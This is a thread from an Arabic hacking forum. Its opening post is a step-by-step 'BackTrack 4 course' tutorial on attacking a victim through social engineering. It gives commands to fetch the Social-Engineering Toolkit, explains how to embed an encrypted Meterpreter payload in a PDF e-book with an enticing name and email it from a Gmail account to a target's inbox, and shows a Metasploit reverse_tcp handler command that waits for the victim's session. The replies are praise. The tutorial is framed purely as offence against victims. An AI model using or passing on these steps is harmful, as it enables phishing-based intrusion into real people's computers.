[دورة الباك تراك 4 ] الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل

[دورة الباك تراك 4 ] الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 20

الموضوع: [دورة الباك تراك 4 ] الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل

  1. #1

    Llahmuh [دورة الباك تراك 4 ] الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل

    بسم الله الرحمن الرحيم ..



    اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

    بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

    بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

    ================================================== ========

    نرجع لموضوعنا ..

    كيف تتم العملية ؟

    1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
    2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
    3-ارسال الملف لبريد الضحية على الانبوكس
    4-التنصت و الانتظار حتى يتم الاتصال بالضحية

    ماهي الادوات اللازمة للقيام بالعملية ؟


    1-Social-Engineering Toolkit
    2-Gmail account
    3-M3tasploit

    طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

    نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

    كود:
    svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
    ملاحظة : يجب ان تكون root ..


    الان ندخل على مجلد الاداة بالامر :

    كود:
    cd SET
    من ثم نشغل الادة عن طريق الامر :

    كود:
    ./set
    و هذي صورة توضيحية للامرين ..


    اشرح لكم الخيارات ..

    الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

    الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

    و الخيارات الباقية للتحديث و صنع بايلودات ..

    عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

    نختار الخيار الاول بالرقم 1 و نشوف :



    مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم




    الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

    نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

    و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter




    الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

    نضغط انتر لاستكمال العملية و ارسال الملف

    بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

    الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

    طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..



    الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
    اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

    نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

    بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

    طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6
    بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

    نحدده و نتبع الخيارات المتبقية ..



    بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..


    الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟




    .. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

    طيب الان نتنصت لانتظار الضحية بالامر :

    كود:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E

    الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !



    تم بحمد الله ...

    ملاحظة هامة :الشرح المصور ده منقول تم نقلو لكي يتم التدقيق في الاوامر وتم عمل شرح فديو مني لكي نطبق عملي ولكن عمليت الاختراق لن تكتمل لانه تم شرح العملية في الصور وكانت اداة SET قديمة فتم عمل شرح فديو على الجديدة.

    تحميل الشرح الفديو :http://arabsh.com/paq2whht53g2.html

    Iam BACK PEOPLE

    Ace 2010-2017

  2. #2

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    مشكوووووووووووووووووووووو ر يامعلم

  3. #3

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    بارك الله فيك ان شاء الله تستفيد .

    Iam BACK PEOPLE

    Ace 2010-2017

  4. #4
    محظور
    تاريخ التسجيل
    Feb 2011
    الدولة
    سوريــآآ الأسدَ
    المشاركات
    1,624

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    هناك حالات يكون الصمت فيها أبلغ من الحديث , واقسم بالله أن هذا ما انتابني عند قراءتي للموضوع ,..~

    فمهما كتبت من عبارات الثناء أو الوصف , لن تفي جهودك حقهآ..~


    بآرك الله فيك وجعلها في ميزآن حسناتك ..~

    تم التثبيت بقوه..~

  5. #5

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    اقتباس المشاركة الأصلية كتبت بواسطة V!RUS TROJAN مشاهدة المشاركة
    هناك حالات يكون الصمت فيها أبلغ من الحديث , واقسم بالله أن هذا ما انتابني عند قراءتي للموضوع ,..~

    فمهما كتبت من عبارات الثناء أو الوصف , لن تفي جهودك حقهآ..~


    بآرك الله فيك وجعلها في ميزآن حسناتك ..~

    تم التثبيت بقوه..~
    بارك الله فيك اخي

    Iam BACK PEOPLE

    Ace 2010-2017

  6. #6

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    مواضيعك روعة أهنيك

    تستاهل التثبيت

    تحياتي



  7. #7
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    كل الاحترام والشكر والتقدير على مجهود المميز والكبير
    بارك الله فيك ولا تحرمنا جديدك
    تحياتي

    I love Yemen




  8. #8

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    اقتباس المشاركة الأصلية كتبت بواسطة cracker مشاهدة المشاركة
    مواضيعك روعة أهنيك

    تستاهل التثبيت

    تحياتي
    شرفني مرورك العطر يا كراكر

    Iam BACK PEOPLE

    Ace 2010-2017

  9. #9

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    اقتباس المشاركة الأصلية كتبت بواسطة BLACK.JaGuAr مشاهدة المشاركة
    كل الاحترام والشكر والتقدير على مجهود المميز والكبير
    بارك الله فيك ولا تحرمنا جديدك
    تحياتي
    مرورك شرف لي ووسام اضعه على صدري يا قائدنا

    Iam BACK PEOPLE

    Ace 2010-2017

  10. #10

    افتراضي رد: (دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...

    يعطيك العافيه ع المووووووووووووووووضووووو وووووووع

صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. [دورة الباك تراك 4 r2]بعض اوامر الباك المهمة (2)
    بواسطة Ace في المنتدى قسم باك تراك BackTrack
    مشاركات: 19
    آخر مشاركة: 11-25-2011, 08:07 PM
  2. مشاركات: 23
    آخر مشاركة: 11-14-2011, 02:15 PM
  3. مشاركات: 14
    آخر مشاركة: 06-27-2011, 08:49 PM
  4. الاختراق بالهندسة الاجتماعية
    بواسطة seif2010 في المنتدى منتدى الإختراق العام
    مشاركات: 7
    آخر مشاركة: 04-27-2011, 04:41 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •